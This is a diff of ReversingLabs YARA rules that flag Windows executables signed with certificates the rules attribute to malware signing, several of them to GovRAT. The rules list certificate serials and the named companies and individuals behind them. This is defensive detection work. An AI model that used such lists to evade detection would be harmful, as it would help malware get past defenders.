+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HON HAI PRECISION INDUSTRY CO. LTD." and pe.signatures [ i ] . serial == "25:65:41:e2:04:61:90:33:f8:b0:9f:9e:b7:c8:8e:f8" and 1424303999 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B0A308Fc2E71Ac4Ac40677B9C27Ccbad : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_00E8Cc18Cf100B6B27443Ef26319398734 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "7e13e257-a264-5a40-b670-889045504acf"
+		id = "f7e80c51-9dcf-599a-8164-c07cf4c9c5ff"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7386-L7404"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1434-L1452"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "21fd7625399c939b6d03100b731709616d206a3811197af2b86991be9d89b4eb"
+		logic_hash = "68e9df056109cae41d981090c7a98ddc192a445647d7475569ddbe4118e570c5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17237,21 +39631,21 @@ rule REVERSINGLABS_Cert_Blocklist_B0A308Fc2E71Ac4Ac40677B9C27Ccbad : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Volpayk LLC" and ( pe.signatures [ i ] . serial == "00:b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" or pe.signatures [ i ] . serial == "b0:a3:08:fc:2e:71:ac:4a:c4:06:77:b9:c2:7c:cb:ad" ) and 1611705600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Syngenta" and ( pe.signatures [ i ] . serial == "00:e8:cc:18:cf:10:0b:6b:27:44:3e:f2:63:19:39:87:34" or pe.signatures [ i ] . serial == "e8:cc:18:cf:10:0b:6b:27:44:3e:f2:63:19:39:87:34" ) and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_61B11Ef9726Ab2E78132E01Bd791B336 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_62Af28A7657Ba8Ab10Fa8E2D47250C69 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "573a024e-11f0-5cf9-8f0d-a946cdca34c5"
+		id = "cba20a1b-5d24-5a1f-8f2f-8c47add846d6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7406-L7422"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1454-L1470"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1a8e72f31039a5a5602d0314f017a2596a23e4a796dc66167dfefc0c9790e3e3"
+		logic_hash = "c3c034cb4e2c65e2269fbfd9c045eb294badde60389ae62ed694ea4d61c5eb35"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17261,21 +39655,21 @@ rule REVERSINGLABS_Cert_Blocklist_61B11Ef9726Ab2E78132E01Bd791B336 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Skalari" and pe.signatures [ i ] . serial == "61:b1:1e:f9:72:6a:b2:e7:81:32:e0:1b:d7:91:b3:36" and 1609372800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AFINA Fintek" and pe.signatures [ i ] . serial == "62:af:28:a7:65:7b:a8:ab:10:fa:8e:2d:47:25:0c:69" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_8Fe807310D98357A59382090634B93F0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_04C8Eca7243208A110Dea926C7Ad89Ce : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "690e7919-0344-5bd1-849f-e7bfe2f19276"
+		id = "484d0aa6-0447-5e60-946b-89b01a5e43dd"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7424-L7442"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1472-L1488"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0ec56bd4783c854efef863050ff729fd99efa98b7b19e04e56a080ee3e75cd90"
+		logic_hash = "0012436e83704397026a8b2e500e5d61915e0f4c8ad4100176e200a975562e8f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17285,21 +39679,21 @@ rule REVERSINGLABS_Cert_Blocklist_8Fe807310D98357A59382090634B93F0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MAVE MEDIA" and ( pe.signatures [ i ] . serial == "00:8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" or pe.signatures [ i ] . serial == "8f:e8:07:31:0d:98:35:7a:59:38:20:90:63:4b:93:f0" ) and 1613433600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, SINGH ADITYA" and pe.signatures [ i ] . serial == "04:c8:ec:a7:24:32:08:a1:10:de:a9:26:c7:ad:89:ce" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_B97F66Bb221772Dc07Ef1D4Bed8F6085 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_157C3A4A6Bcf35Cf8453E6B6C0072E1D : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "c83918d8-fe90-59dc-8f4e-0e7b10238780"
+		id = "4bae3fb2-7e30-598e-8708-b985697bf63a"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7444-L7462"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1490-L1506"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "794dc27ff9b2588d3f2c31cdb83e53616c604aa41da7d8c895034e1cf9da5dd8"
+		logic_hash = "2a68051ab6d0b967f08e44d91b9f13d75587ea0f16e2a5536ccf5898445e1a58"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17309,21 +39703,21 @@ rule REVERSINGLABS_Cert_Blocklist_B97F66Bb221772Dc07Ef1D4Bed8F6085 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "S-PRO d.o.o." and ( pe.signatures [ i ] . serial == "00:b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" or pe.signatures [ i ] . serial == "b9:7f:66:bb:22:17:72:dc:07:ef:1d:4b:ed:8f:60:85" ) and 1614556800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Favorite-III" and pe.signatures [ i ] . serial == "15:7c:3a:4a:6b:cf:35:cf:84:53:e6:b6:c0:07:2e:1d" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Fed006Fbf85Cd1C6Ba6B4345B198E1E6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_04422F12037Bc2032521Dbb6Ae02Ea0E : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "ab84282d-9c35-5e52-a117-1d85c03cc6f4"
+		id = "0dc659e8-1f3b-5130-a776-dd9e4141f5f3"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7464-L7482"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1508-L1524"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0360c6760f1018f9388ef5639ab2306879134f33da12677f954fa31b8a71aa16"
+		logic_hash = "381d749d24121d6634656fd33adcda5c3e500ee77a6333f525f351a2ee589e2c"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17333,21 +39727,21 @@ rule REVERSINGLABS_Cert_Blocklist_Fed006Fbf85Cd1C6Ba6B4345B198E1E6 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LoL d.o.o." and ( pe.signatures [ i ] . serial == "00:fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" or pe.signatures [ i ] . serial == "fe:d0:06:fb:f8:5c:d1:c6:ba:6b:43:45:b1:98:e1:e6" ) and 1614297600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Muhammad Lee" and pe.signatures [ i ] . serial == "04:42:2f:12:03:7b:c2:03:25:21:db:b6:ae:02:ea:0e" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Aa28C9Bd16D9D304F18Af223B27Bfa1E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_65Eae6C98111Dc40Bf4F962Bf27227F2 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "facb8bba-a8cc-5b2a-9ef6-ba290cbf9b24"
+		id = "34275efd-b941-56f5-8e1b-30a43f1936e2"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7484-L7502"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1526-L1542"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "feaa8d645eea46c7cbbba4ba86c92184df7515a50f1f905ab818c59079a0c96a"
+		logic_hash = "20c0f4e9783586e68ff363fe6a72398f6ea27aef5d25f98872d1203ce1a0c9bd"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17357,21 +39751,21 @@ rule REVERSINGLABS_Cert_Blocklist_Aa28C9Bd16D9D304F18Af223B27Bfa1E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Tecno trade d.o.o." and ( pe.signatures [ i ] . serial == "00:aa:28:c9:bd:16:d9:d3:04:f1:8a:f2:23:b2:7b:fa:1e" or pe.signatures [ i ] . serial == "aa:28:c9:bd:16:d9:d3:04:f1:8a:f2:23:b2:7b:fa:1e" ) and 1611705600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, BHARATH KUCHANGI" and pe.signatures [ i ] . serial == "65:ea:e6:c9:81:11:dc:40:bf:4f:96:2b:f2:72:27:f2" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_19Beff8A6C129663E5E8C18953Dc1F67 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_12D5A4B29Fe6156D4195Fba55Ae0D9A9 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "300d9e11-9283-500e-9716-5b628ef41853"
+		id = "45c37c98-1006-51e4-8832-b8e5c9fba416"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7504-L7520"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1544-L1560"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0ec031c781ebad7447cfc53ce791aacc8f24e38f039c84e2ee547de64729ae76"
+		logic_hash = "860550745f6dbcd7dd0925d9b8f04e8e08e8b7c06343a4c070e131a815c42e12"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17381,21 +39775,21 @@ rule REVERSINGLABS_Cert_Blocklist_19Beff8A6C129663E5E8C18953Dc1F67 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CULNADY LTD LTD" and pe.signatures [ i ] . serial == "19:be:ff:8a:6c:12:96:63:e5:e8:c1:89:53:dc:1f:67" and 1608163200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Marc Chapon" and pe.signatures [ i ] . serial == "12:d5:a4:b2:9f:e6:15:6d:41:95:fb:a5:5a:e0:d9:a9" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_029685Cda1C8233D2409A31206F78F9F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0087D60D1E2B9374Eb7A735Dce4Bbdae56 : INFO FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Certificate used for digitally signing GovRAT malware."
 		author = "ReversingLabs"
-		id = "f7894a48-459b-574f-9df3-8505578de42b"
+		id = "8759a40a-648e-548e-a519-bedc812aefe4"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7522-L7538"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1562-L1580"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d541ce73e5039541ea221f27cc4d033f0c477e41a148206c26cc39ae07c4caaa"
+		logic_hash = "d6e0d22e926a237f1cc6b71c6f8ce01e497723032c9efba1e6af7327a786b608"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17405,21 +39799,21 @@ rule REVERSINGLABS_Cert_Blocklist_029685Cda1C8233D2409A31206F78F9F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KOTO TRADE, dru\\xC5\\xBEba za posredovanje, d.o.o." and pe.signatures [ i ] . serial == "02:96:85:cd:a1:c8:23:3d:24:09:a3:12:06:f7:8f:9f" and 1612396800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMO-K Limited Liability Company" and ( pe.signatures [ i ] . serial == "00:87:d6:0d:1e:2b:93:74:eb:7a:73:5d:ce:4b:bd:ae:56" or pe.signatures [ i ] . serial == "87:d6:0d:1e:2b:93:74:eb:7a:73:5d:ce:4b:bd:ae:56" ) and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D609B6C95428954A999A8A99D4F198Af : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0860C8A7Ed18C3F030A32722Fd2B220C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4ce9b2ce-5dda-5741-bd29-cadae44c3b28"
+		id = "335a1cd3-520a-5f0f-abda-6ec8a122de4b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7540-L7558"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1582-L1598"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a124f80d599051ecd7c17e6818d181ea018db14c9f0514bbcc5b677ba3656d65"
+		logic_hash = "3c777fb157a6669bfdf3143e77f69265e09458a2b42b75b72680eb043da71e85"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17429,21 +39823,21 @@ rule REVERSINGLABS_Cert_Blocklist_D609B6C95428954A999A8A99D4F198Af : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Fudl" and ( pe.signatures [ i ] . serial == "00:d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" or pe.signatures [ i ] . serial == "d6:09:b6:c9:54:28:95:4a:99:9a:8a:99:d4:f1:98:af" ) and 1612828800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Tony Yeh" and pe.signatures [ i ] . serial == "08:60:c8:a7:ed:18:c3:f0:30:a3:27:22:fd:2b:22:0c" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D3356318924C8C42959Bf1D1574E6482 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2Fdadd0740572270203F8138692C4A83 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "36b12300-6535-5644-9145-9f532b49a421"
+		id = "0b289c4e-c564-5513-a1a5-42e8551c6218"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7560-L7578"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1600-L1616"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "a672054a776d0715fc888578bcb559d24ef54b4c523f7d49a39ded2586c3140a"
+		logic_hash = "18ce7ed721a454c5bb3cd6ab26df703b1e08b94b8c518055feffa38ad42afa50"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17453,21 +39847,21 @@ rule REVERSINGLABS_Cert_Blocklist_D3356318924C8C42959Bf1D1574E6482 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADV TOURS d.o.o." and ( pe.signatures [ i ] . serial == "00:d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" or pe.signatures [ i ] . serial == "d3:35:63:18:92:4c:8c:42:95:9b:f1:d1:57:4e:64:82" ) and 1613001600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, William Zoltan" and pe.signatures [ i ] . serial == "2f:da:dd:07:40:57:22:70:20:3f:81:38:69:2c:4a:83" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_31D852F5Fca1A5966B5Ed08A14825C54 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Fc13D6220C629043A26F81B1Cad72D8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "362a6eb7-f49e-502b-9870-522aea13e04b"
+		id = "c2573adc-6580-58aa-a58c-c21bf6b79364"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7580-L7596"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1618-L1634"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8c98b856d53e6862e94042bb133f5739bddcec2e208e43961b23e244584c6ee4"
+		logic_hash = "5572c278f6c9be62b2bba09ea610fd170438c6893ee5283ff4a5b3bb2852b07b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17477,21 +39871,21 @@ rule REVERSINGLABS_Cert_Blocklist_31D852F5Fca1A5966B5Ed08A14825C54 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BBT KLA d.o.o." and pe.signatures [ i ] . serial == "31:d8:52:f5:fc:a1:a5:96:6b:5e:d0:8a:14:82:5c:54" and 1612396800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, meicun ge" and pe.signatures [ i ] . serial == "4f:c1:3d:62:20:c6:29:04:3a:26:f8:1b:1c:ad:72:d8" and 1404172799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_17D99Cc2F5B29522D422332E681F3E18 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_3457A918C6D3701B2Eaca6A92474A7Cc : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0d0a58a4-353d-51f9-a739-a135d77357c9"
+		id = "12526715-7b54-5c31-aa2a-b77ed067e3ee"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7598-L7614"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1636-L1652"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "55cc1634cdc5209d68b98fdb0d9e97e0a34346cdcb10f243d13217cda01195f1"
+		logic_hash = "70d4bece52a86bfe8958f6d4195b833cea609596e3b68bb90087c262501bd462"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17501,21 +39895,21 @@ rule REVERSINGLABS_Cert_Blocklist_17D99Cc2F5B29522D422332E681F3E18 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PKV Trading ApS" and pe.signatures [ i ] . serial == "17:d9:9c:c2:f5:b2:95:22:d4:22:33:2e:68:1f:3e:18" and 1613088000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KONSALTING PLUS OOO" and pe.signatures [ i ] . serial == "34:57:a9:18:c6:d3:70:1b:2e:ac:a6:a9:24:74:a7:cc" and 1432252799 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6A568F85De2061F67Ded98707D4988Df : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_621Ed8265B0Ad872D9F4B4Ed6D560513 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "962c3096-2c3d-5137-9637-b45d00b2ee9b"
+		id = "b64e640c-264f-597c-90a5-d0ad57aa5075"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L7616-L7632"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L1654-L1670"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "793be308a4df55c3b325e1ee3185159c4155f6dfabc311216d3763bd43680bd4"
+		logic_hash = "c133d6eea5d27e597d0a656c7c930a5ca84adb46aa2fec66381b6b5c759e22aa"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -17525,21 +39919,21 @@ rule REVERSINGLABS_Cert_Blocklist_6A568F85De2061F67Ded98707D4988Df : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Apladis" and pe.signatures [ i ] . serial == "6a:56:8f:85:de:20:61:f6:7d:ed:98:70:7d:49:88:df" and 1613001600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fan Li" and pe.signatures [ i ] . serial == "62:1e:d8:26:5b:0a:d8:72:d9:f4:b4:ed:6d:56:05:13" and 1413183357 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_038Fc745523B41B40D653B83Aa381B80 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_56E22B992B4C7F1Afeac1D63B492Bf54 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3f7f9d58-3a7a-5f84-bf6e-795a9c8bcd38"
+		id = "28609e75-47cb-5017-bb92-046a9e8931c6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
